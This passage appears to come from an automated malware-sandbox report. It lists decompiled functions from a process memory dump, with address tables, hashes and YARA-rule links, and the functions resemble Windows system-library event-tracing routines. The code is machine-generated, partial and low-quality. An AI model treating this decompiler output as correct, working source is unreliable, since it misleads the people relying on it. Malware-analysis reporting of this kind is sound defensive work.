					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0310B640(E03109AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                    0x0317fe3f
                                                                                                                                                    0x0317fe3f
                                                                                                                                                    0x0317fe4e
                                                                                                                                                    0x0317fe58
                                                                                                                                                    0x0317fe5d
                                                                                                                                                    0x0317fe5f
                                                                                                                                                    0x0317fe6a
                                                                                                                                                    0x0317fe72
                                                                                                                                                    0x0317fe75
                                                                                                                                                    0x0317fe78
                                                                                                                                                    0x0317fe83
                                                                                                                                                    0x0317fe95
                                                                                                                                                    0x0317fe85
                                                                                                                                                    0x0317fe8e
                                                                                                                                                    0x0317fe8e
                                                                                                                                                    0x0317fea0
                                                                                                                                                    0x0317fea1
                                                                                                                                                    0x0317fea3
                                                                                                                                                    0x0317fea8
                                                                                                                                                    0x0317febd

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a075e97e977c200fd0a3e252cda2147d7c134a90527b9dcc4da548269571a657
                                                                                                                                                    • Instruction ID: 26b22ae34134cc2453de1fb127d7ffa168605cc0ec656557ee6d079f6cb375b6
                                                                                                                                                    • Opcode Fuzzy Hash: a075e97e977c200fd0a3e252cda2147d7c134a90527b9dcc4da548269571a657
                                                                                                                                                    • Instruction Fuzzy Hash: 1C018475A05308AFCB14DFA9D845FAFB7B8EF48700F044066B900AB291DB74D951C7A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0317FEC0, Relevance: .0, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E0317FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x31bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0310FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E030E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0310B640(E03109AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                    0x0317fec0
                                                                                                                                                    0x0317fec0
                                                                                                                                                    0x0317fecf
                                                                                                                                                    0x0317fed9
                                                                                                                                                    0x0317fede
                                                                                                                                                    0x0317fee0
                                                                                                                                                    0x0317feeb
                                                                                                                                                    0x0317fef3
                                                                                                                                                    0x0317fef6
                                                                                                                                                    0x0317fef9
                                                                                                                                                    0x0317ff04
                                                                                                                                                    0x0317ff16
                                                                                                                                                    0x0317ff06
                                                                                                                                                    0x0317ff0f
                                                                                                                                                    0x0317ff0f
                                                                                                                                                    0x0317ff21
                                                                                                                                                    0x0317ff22
                                                                                                                                                    0x0317ff24
                                                                                                                                                    0x0317ff29
                                                                                                                                                    0x0317ff3e

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7de2e87c3985c5a6745f82f88a67af6b389f696996f78c80e31db51addc55914
                                                                                                                                                    • Instruction ID: aef03ccf1a6a22614e3756f265431b2d44f50a2ded3d0c28f0d6600b83ccb85f
                                                                                                                                                    • Opcode Fuzzy Hash: 7de2e87c3985c5a6745f82f88a67af6b389f696996f78c80e31db51addc55914
                                                                                                                                                    • Instruction Fuzzy Hash: C3018475A05308AFCB14DFA9D845FAFB7B8EF49700F044066B900AB291EB74DA41C794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198A62, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E03198A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x31bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E030E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0310B640(E03109AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                    0x03198a62
                                                                                                                                                    0x03198a71
                                                                                                                                                    0x03198a79
                                                                                                                                                    0x03198a82
                                                                                                                                                    0x03198a85
                                                                                                                                                    0x03198a89
                                                                                                                                                    0x03198a8c
                                                                                                                                                    0x03198a8f
                                                                                                                                                    0x03198a92
                                                                                                                                                    0x03198a95
                                                                                                                                                    0x03198a9f
                                                                                                                                                    0x03198ab1
                                                                                                                                                    0x03198aa1
                                                                                                                                                    0x03198aaa
                                                                                                                                                    0x03198aaa
                                                                                                                                                    0x03198abc
                                                                                                                                                    0x03198abd
                                                                                                                                                    0x03198abf
                                                                                                                                                    0x03198ac4
                                                                                                                                                    0x03198ada

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c58d279da60a8059410d1d4bcaa39278a7e837a7c4fa5f8d0f7d3d69c0dfd95
                                                                                                                                                    • Instruction ID: 8eb177a77c616c4abb30cf5d230409482fc2ca0f3db9623bd6e53f8f525024c9
                                                                                                                                                    • Opcode Fuzzy Hash: 4c58d279da60a8059410d1d4bcaa39278a7e837a7c4fa5f8d0f7d3d69c0dfd95
                                                                                                                                                    • Instruction Fuzzy Hash: 7D011AB5A0521CAFDB04DFA9D9419AEB7B8EF4D710F10405AF904EB391EB74A9008BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198ED6, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E03198ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x31bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E030E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0310B640(E03109AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                                                    0x03198ed6
                                                                                                                                                    0x03198ee5
                                                                                                                                                    0x03198eed
                                                                                                                                                    0x03198ef0
                                                                                                                                                    0x03198efa
                                                                                                                                                    0x03198f03
                                                                                                                                                    0x03198f0c
                                                                                                                                                    0x03198f15
                                                                                                                                                    0x03198f24
                                                                                                                                                    0x03198f27
                                                                                                                                                    0x03198f31
                                                                                                                                                    0x03198f43
                                                                                                                                                    0x03198f33
                                                                                                                                                    0x03198f3c
                                                                                                                                                    0x03198f3c
                                                                                                                                                    0x03198f4e
                                                                                                                                                    0x03198f4f
                                                                                                                                                    0x03198f51
                                                                                                                                                    0x03198f56
                                                                                                                                                    0x03198f69

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 68d52a0a0126436a51f1499fc27e920ef135fd518388aa41c66847d36cb756e4
                                                                                                                                                    • Instruction ID: 1158f2392a3e1001e3475072abfa744ec9263cb2a01745697c9247ab4cb343e2
                                                                                                                                                    • Opcode Fuzzy Hash: 68d52a0a0126436a51f1499fc27e920ef135fd518388aa41c66847d36cb756e4
                                                                                                                                                    • Instruction Fuzzy Hash: D2110974A042099FDB04DFA8D445AAEBBF4BB08700F0442AAE918EB382E7749940CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CDB60, Relevance: .0, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E030CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E030CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L030CE8B0(__ecx, _t14, 0xfff);
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                                                    0x030cdb64
                                                                                                                                                    0x030cdb66
                                                                                                                                                    0x030cdb6b
                                                                                                                                                    0x030cdbaa
                                                                                                                                                    0x030cdb71
                                                                                                                                                    0x030cdb76
                                                                                                                                                    0x030cdb7a
                                                                                                                                                    0x030cdba3
                                                                                                                                                    0x030cdb7c
                                                                                                                                                    0x030cdb87
                                                                                                                                                    0x030cdb8b
                                                                                                                                                    0x03124fa1
                                                                                                                                                    0x03124fb3
                                                                                                                                                    0x03124fb8
                                                                                                                                                    0x030cdb91
                                                                                                                                                    0x030cdb96
                                                                                                                                                    0x030cdb98
                                                                                                                                                    0x030cdb98
                                                                                                                                                    0x030cdb8b
                                                                                                                                                    0x030cdb7a
                                                                                                                                                    0x030cdb9d
                                                                                                                                                    0x030cdba2

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                    • Instruction ID: 1c810bcc09c4c7e02271b3392815e9f0844862dc52c93c4476ebc8bbcdd35e17
                                                                                                                                                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                                    • Instruction Fuzzy Hash: E1F0C8372236A2DBD332DB5588D0B6FB6A59FC1A60F19043DF2099B244CA60880296D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CB1E1, Relevance: .0, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E030E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E030E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03147016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                                    0x030cb1e8
                                                                                                                                                    0x030cb1ea
                                                                                                                                                    0x030cb1f3
                                                                                                                                                    0x03124a17
                                                                                                                                                    0x030cb1f9
                                                                                                                                                    0x030cb1f9
                                                                                                                                                    0x030cb1f9
                                                                                                                                                    0x030cb201
                                                                                                                                                    0x03124a21
                                                                                                                                                    0x03124a2e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124a3b
                                                                                                                                                    0x03124a4d
                                                                                                                                                    0x03124a3d
                                                                                                                                                    0x03124a46
                                                                                                                                                    0x03124a46
                                                                                                                                                    0x03124a55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030cb20a
                                                                                                                                                    0x030cb20a
                                                                                                                                                    0x030cb20a
                                                                                                                                                    0x030cb20a

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                    • Instruction ID: 3042efa01a56223635d0489d3d3e779a8287d8d42a5d27b6fcecb7f297b82f47
                                                                                                                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                                    • Instruction Fuzzy Hash: 1701AD322126949BD322D75AD805B69BF98EF95750F0E00A5E9158B6A1DB79C8108254
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0315FE87, Relevance: .0, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                    			E0315FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x31bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E030E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0310B640(E03109AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                                                    0x0315fe96
                                                                                                                                                    0x0315fe9e
                                                                                                                                                    0x0315fea1
                                                                                                                                                    0x0315fead
                                                                                                                                                    0x0315feb3
                                                                                                                                                    0x0315feb9
                                                                                                                                                    0x0315fec3
                                                                                                                                                    0x0315fed5
                                                                                                                                                    0x0315fec5
                                                                                                                                                    0x0315fece
                                                                                                                                                    0x0315fece
                                                                                                                                                    0x0315fee0
                                                                                                                                                    0x0315fee1
                                                                                                                                                    0x0315fee3
                                                                                                                                                    0x0315fee8
                                                                                                                                                    0x0315fefb

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f9d96e6491d8427dc2d9e67e82f4a5abd8739130792e7100ec2a0229afa90834
                                                                                                                                                    • Instruction ID: 5f088a0eb72558e5fb83db058a3adeef0d2f9db02e0edda0c2407faa024a15b7
                                                                                                                                                    • Opcode Fuzzy Hash: f9d96e6491d8427dc2d9e67e82f4a5abd8739130792e7100ec2a0229afa90834
                                                                                                                                                    • Instruction Fuzzy Hash: 2C01FF74A04208EFCB14DFA8D546A6EB7B4EF08704F144169B915EB392DB75D912CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318131B, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                    			E0318131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x31bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E030E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0310B640(E03109AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                                    0x0318131b
                                                                                                                                                    0x0318132a
                                                                                                                                                    0x03181330
                                                                                                                                                    0x03181336
                                                                                                                                                    0x0318133e
                                                                                                                                                    0x03181341
                                                                                                                                                    0x03181344
                                                                                                                                                    0x0318134f
                                                                                                                                                    0x03181361
                                                                                                                                                    0x03181351
                                                                                                                                                    0x0318135a
                                                                                                                                                    0x0318135a
                                                                                                                                                    0x0318136c
                                                                                                                                                    0x0318136d
                                                                                                                                                    0x0318136f
                                                                                                                                                    0x03181374
                                                                                                                                                    0x03181387

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: befb04c52d7cf7bbd5c89e08f40a4c6bfc7758547af961f164e4f410868677b4
                                                                                                                                                    • Instruction ID: 00ea1e1e396bb18b9708bff17747ca4e183588d6ae7f68cdc664924e3f534795
                                                                                                                                                    • Opcode Fuzzy Hash: befb04c52d7cf7bbd5c89e08f40a4c6bfc7758547af961f164e4f410868677b4
                                                                                                                                                    • Instruction Fuzzy Hash: BF011975A05208AFCB04EFA9D545AAEB7F4EF48700F008069B905EB391EB749A40CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198F6A, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                    			E03198F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x31bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E030E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0310B640(E03109AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                                    0x03198f6a
                                                                                                                                                    0x03198f79
                                                                                                                                                    0x03198f81
                                                                                                                                                    0x03198f84
                                                                                                                                                    0x03198f8b
                                                                                                                                                    0x03198f91
                                                                                                                                                    0x03198f94
                                                                                                                                                    0x03198f9e
                                                                                                                                                    0x03198fb0
                                                                                                                                                    0x03198fa0
                                                                                                                                                    0x03198fa9
                                                                                                                                                    0x03198fa9
                                                                                                                                                    0x03198fbb
                                                                                                                                                    0x03198fbc
                                                                                                                                                    0x03198fbe
                                                                                                                                                    0x03198fc3
                                                                                                                                                    0x03198fd6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f46da5cfb5c2df0ed739b9641c2631f62dacede72f49b51029a92c743679806
                                                                                                                                                    • Instruction ID: 612bca91d988592a1706ff55720101f8f76e40ffdb76390aedebe94ee57c1c00
                                                                                                                                                    • Opcode Fuzzy Hash: 8f46da5cfb5c2df0ed739b9641c2631f62dacede72f49b51029a92c743679806
                                                                                                                                                    • Instruction Fuzzy Hash: AB01EC75A0520CAFDB04EFA9D545AAEB7B4EF4C700F50846AB905EB391EB74DA00CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03181608, Relevance: .0, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                    			E03181608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x31bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E030E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0310B640(E03109AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                                                                    0x03181608
                                                                                                                                                    0x03181617
                                                                                                                                                    0x0318161d
                                                                                                                                                    0x03181625
                                                                                                                                                    0x03181628
                                                                                                                                                    0x0318162b
                                                                                                                                                    0x03181636
                                                                                                                                                    0x03181648
                                                                                                                                                    0x03181638
                                                                                                                                                    0x03181641
                                                                                                                                                    0x03181641
                                                                                                                                                    0x03181653
                                                                                                                                                    0x03181654
                                                                                                                                                    0x03181656
                                                                                                                                                    0x0318165b
                                                                                                                                                    0x0318166e

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7f2aafef86f297bfad5fe588412aa6aba3a90fdfaf0c4984c7e08ed8741ac582
                                                                                                                                                    • Instruction ID: 243dbe14aced54ddcdd48b04db10f7d27cd51aafd68a8b07b111d1af9b1d34fa
                                                                                                                                                    • Opcode Fuzzy Hash: 7f2aafef86f297bfad5fe588412aa6aba3a90fdfaf0c4984c7e08ed8741ac582
                                                                                                                                                    • Instruction Fuzzy Hash: ECF06D75A05348EFCB04EFA8D445AAEB7F4EF08300F0440A9B905EB391EB74D900CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EC577, Relevance: .0, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E030EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x30a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E031988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                                    0x030ec577
                                                                                                                                                    0x030ec57d
                                                                                                                                                    0x030ec581
                                                                                                                                                    0x030ec5b5
                                                                                                                                                    0x030ec5b9
                                                                                                                                                    0x030ec5ce
                                                                                                                                                    0x030ec5ce
                                                                                                                                                    0x030ec5ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ec5ca
                                                                                                                                                    0x030ec5c4
                                                                                                                                                    0x030ec5c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ec5ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ec5af

                                                                                                                                                    Memory Dump Source
